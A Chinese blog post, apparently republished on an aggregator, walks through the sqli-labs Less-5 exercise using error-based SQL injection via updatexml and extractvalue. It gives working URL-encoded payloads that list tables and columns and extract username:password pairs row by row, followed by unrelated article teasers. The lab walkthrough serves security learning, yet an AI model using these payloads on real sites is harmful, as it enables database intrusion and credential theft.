sql 注入之sqli-labs/less-5 双注入，也称：报错注入

sql 注入之sqli-labs/less-5 双注入，也称：报错注入

news/2025/6/9 4:36:11/文章来源:https://blog.csdn.net/qq_27249127/article/details/136435275

该关卡返回正确或者错误页面,还有错误的代码，所以可以使用报错注入。报错注入的方式：

updatexml 函数注入：

mysql5.1.5 版本以上支持该函数，返回数据限制32位

模板：select * from user where id=1 and (updatexml("任意字符", concat(0x7e,(select database()),0x7e),"任意字符")) ; 0x7e 可以换成其他符号用来充当间隔符，比如"~","*" 等

payload：

id=1 ' and (updatexml(1,concat(0x7e,(select database()),0x7e),1)) --+

extractvalue 函数注入：

mysql 5.1.5 版本以上才支持该函数，返回数据限制为32 位，可以使用substring 函数进行数据位移偏转

模板：select * from user where id =1 and (extractvalue(1,concat(0x7e,(select database()),0x7e)));

payload:

id=1' and ( extractvalue(1, concat (0x7e,(select database()),"*")))--+

~~floor 函数注入：~~

~~只能用concat连接，不能用group_concat,每次只能显示一条数据，~~

~~count ：查询数量 rand ：随机产生0-1 之间的数，floor ：向下取整，group_by：按照指定字段分类~~

~~模板：~~

~~select * from user where id =1 and ( select 1 from ( select count(), concat(user(),floor(rand(0)2)) x from information_schema.table group_by x )a )~~

~~payload:~~

正确页面：

错误页面：

输入单引号试探，发现页面会把sql报错语句显示在页面：

报错注入

查找数据库payload：

?id=1%27%20and%20(updatexml%20(1,%20concat(%200x7e,(select%20database()),%27~%27),1))%20--+

查找表：

id=1%27%20and%20(%20extractvalue(1,%20concat%20(0x7e,(select%20%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()),"*")))--+

查找列名：返回结果超过1 行

?id=1%27%20and%20(%20extractvalue(1,%20concat%20(0x7e,(select%20%20column_name%20from%20information_schema.columns%20where%20table_name=%27users%27)%20,"*")))%20--+

payload 改为：每次只显示一行

1' and ( extractvalue(1, concat (0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1),"*")))--+

limit 0,1 limit 1,1 limit 5,1 分别查出字段名

查找字段内容：

payload :

1%27%20and%20(%20extractvalue(1,%20concat%20(0x7e,(select%20username%20from%20users%20),"*")))--+

0x3c,0x68,0x72,0x2f,0x3e : 换行符

不能一次显示所有内容，所以分次查询：

id=1%27%20and%20(%20extractvalue(1,%20concat%20(0x7e,(select%20concat(username,":",password)%20from%20users%20limit%203,1),"*")))--+

用limit 0,1 limit n,1 来查看具体内容

~~1' and ( extractvalue(1, concat (0x7e,(select username from users),"*")))--+~~

~~1' and ( extractvalue(1, concat (0x7e,(select username from users limit 0,1),"*")))--+~~

~~1' and ( extractvalue(1, concat (0x7e,(select username from users where database='security'),"*")))--+~~

~~1' and ( extractvalue(1, concat (0x7e,(select username from users limit 0,1),"*")))--+~~

~~1' and ( extractvalue(1, concat (0x7e,(select group_concat(username) from users ),"*")))--+~~

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.mzph.cn/news/726554.shtml

如若内容造成侵权/违法违规/事实不符，请联系多彩编程网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

相关文章

一次一对一服务引起的沉思和笑话（微信号Stefan）

一次一对一服务引起的沉思和笑话（微信号Stefan）

前情提要客户需求： 分析页面代码和接口请求协议和参数需求，将人工下载视频怎么获得最终的视频链接，这一逻辑清晰的展示并讲解清除。我询问了是否需要成品爬虫，他说代码他自己能搞定。我给的价格选择： 第一种、首…

阅读更多...

超好用的golang工具分享

超好用的golang工具分享

go-callvis-代码调用关系的可视化工具 go-callvis是一个代码调用关系的可视化工具，它可以帮助我们了解指定项目代码的结构，以达到更快的理解代码意图的目的。工具使用简单，步骤如下： // 1. 安装 git clone https://github.com…

阅读更多...

ChatGPT写QT读写串口数据的Demo

ChatGPT写QT读写串口数据的Demo

突发奇想，想使用ChatGPT试试能不能写一个读写串口数据的demo,以下为测试结果： #include <QCoreApplication> #include <QtSerialPort/QSerialPort> #include <QtSerialPort/QSerialPortInfo> #include <QDebug>int main(int ar…

阅读更多...

蓝桥杯练习系统（算法训练）ALGO-983 最大获利

蓝桥杯练习系统（算法训练）ALGO-983 最大获利

资源限制内存限制：256.0MB C/C时间限制：1.0s Java时间限制：3.0s Python时间限制：5.0s 问题描述 Chakra是一位年轻有为的企业家，最近他在进军餐饮行业。他在各地开拓市场，共买下了N个饭店。在初期的…

阅读更多...

python 爬虫爬取知乎LOL图片（亲测）

python 爬虫爬取知乎LOL图片（亲测）

获取信息访问url后按f12调试点击network 定位图片信息： 可以看到，每个图片的名字和下载地址在标红处，示例如下： data-actualsrc“https://pic4.zhimg.com/v2-1681ff26afbd5f92aa5790b4dee6a63f_b.jpg” 现在就是requests访问…

阅读更多...

Linux之线程概念

Linux之线程概念

目录一、细粒度划分 1、堆区细粒度划分 2、物理内存和可执行程序细粒度划分 3、虚拟地址到物理地址的转化二、线程的概念 1、基本概念 2、线程的优点 3、线程的缺点 4、线程异常 5、线程用途三、Linux下的进程和线程一、细粒度划分 1、堆区细粒度划分在语言…

阅读更多...

MySQL 备份方案

MySQL 备份方案

优质博文：IT-BLOG-CN 一、为什么要备份【1】容灾恢复：硬件故障、不经意的 Bug 导致数据损坏，或者服务器及其数据由于某些原因不可获取或无法使用等（例如：机房大楼烧毁，恶意的黑客攻击或 Mysql 的 Bug 等&…

阅读更多...

8、Linux驱动开发：驱动-读写接口实现(readwrite)

8、Linux驱动开发：驱动-读写接口实现(readwrite)

目录 🍅点击这里查看所有博文随着自己工作的进行，接触到的技术栈也越来越多。给我一个很直观的感受就是，某一项技术/经验在刚开始接触的时候都记得很清楚。往往过了几个月都会忘记的差不多了，只有经常会用到的东西才有可能真正记…

阅读更多...

网络协议学习DAY1

网络协议学习DAY1

1.网络协议模型: OSI协议模型应用层实际发送的数据表示层发送的数据是否加密会话层是否建立会话连接传输层数据传输的方式（数据报、流式） 网…

阅读更多...

Seata 2.x 系列【4】产品简介

Seata 2.x 系列【4】产品简介

有道无术，术尚可求，有术无道，止于术。本系列Spring Boot 版本 3.1.0 本系列Seata 版本 2.0.0 源码地址：https://gitee.com/pearl-organization/study-seata-demo 文章目录 1. 概述2. 发展历史3. 核心术语3.1 TC3.2 TM3.3 RM 4.…

阅读更多...

Unity3D 冯高光与布林冯高光经验模型详解

Unity3D 冯高光与布林冯高光经验模型详解

前言 Unity3D是一款非常流行的游戏开发引擎，它为开发者提供了丰富的功能和工具，使得开发游戏变得更加简单和高效。在Unity3D中，冯高光与布林冯高光经验模型是一种常用的光照模型，用来模拟光线在表面上的反射和折射效果。本文将详…

阅读更多...

国创证券|存钱有窍门，掌握这五个窍门利息高出不少？

国创证券|存钱有窍门，掌握这五个窍门利息高出不少？

大部分居民会把手中闲置的资金存入银行，享用安稳的收益，其间存在以下五个诀窍： 1、比照不同银行的利率储户在去银行存钱时，能够比照不同银行的利率，尽量地挑选利率较高的银行存，来获取较多的收益&#x…

阅读更多...

MYSQL筛选字段是否为手机号码

MYSQL筛选字段是否为手机号码

1、需要判断导出的手机号正确性 2、观察到数据中包含“1”、“86”、“86”开头的手机号 3、手机号验证规则，1（861，861）开头的，第二位从3-9的11位数字（除去86，86开头） 百度到的正…

阅读更多...

URL?后参数有特殊字符问题

URL?后参数有特殊字符问题

前端对于URL的参数不做处理不处理、用URLDecoder.decode()处理、用URLEncoder.encode()处理、用URLEncoder.encode()处理后再用URLDecoder.decode()处理结果前端对于URL的参数用encodeURIComponent(‘XF-OPPZZD-26*316’)处理结果前端不处理有&字符时结果会把后…

阅读更多...

BUUCTF---[极客大挑战 2019]BabySQL1

BUUCTF---[极客大挑战 2019]BabySQL1

1.这道题和之前做的几道题是相似的，这道题考的知识点更多。难度也比之前的大一些 2.尝试万能密码 or 1#发现过滤了or,使用1和1,发现他对单引号也进行了过滤。于是我尝试进行双写绕过，发现可以通过了。 3.由之前的做题经验可知，这道题会涉及到…

阅读更多...

【C#语言入门】10. 操作符详解（下）

【C#语言入门】10. 操作符详解（下）

【C#语言入门】10. 操作符详解（下） 四、各类操作符的示例 (T)x 强制类型转换符 //ushort的maxvalue是65535 uint x 65536; ushort y (ushort)x; Console.WriteLine(y);//结果为0类型转换隐式（implicit）类型转换不丢失精度的…

阅读更多...

CMake的cmake_dependent_option用法

CMake的cmake_dependent_option用法

前言本篇文章讲解CMake的cmake_dependent_option用法选项和变量在讲cmake_dependent_option之前，先讲一下CMake的选项和变量选项在CMake中，选项可以用来控制构建过程中的一些开关。我们可以使用option()命令来添加一个选项。option的函数原型如…

阅读更多...

ChatGPT的安全警告

ChatGPT的安全警告

ChatGPT作为一种强大的人工智能模型，在提供便利的同时，确实存在一些安全隐患，需要引起我们的关注和重视。首先，ChatGPT可能会提供不准确或虚假的信息。这主要源于其训练数据的多样性和复杂性，以及模型的自身局限性。…

阅读更多...

每日汇评：黄金上破2161美元纪录高位，有可能进一步上涨?

每日汇评：黄金上破2161美元纪录高位，有可能进一步上涨?

周四早间，金价在2150美元的历史高点附近盘整，并成功上破2160历史高位； 美元在美债收益率的压力下逐步走低，市场期待更多鲍威尔讲话和美国就业数据； 日线图上的RSI指标超买状况继续令黄金买家保持谨慎； 金价…

阅读更多...

中外联合培养工商管理博士|社科大新加坡社科大学中文授课DBA

中外联合培养工商管理博士|社科大新加坡社科大学中文授课DBA

中外联合培养工商管理博士|社科大新加坡社科大学中文授课DBA 全球经济正在经历由科技进步和创新、政治和人口剧烈变化所带来的巨大的不确定性和挑战。面对日趋复杂的外部竞争环境，企业的领导者和管理者需要具备卓越的战略思维和全球洞察力、以科学的精神和严谨务实的…

阅读更多...

最新文章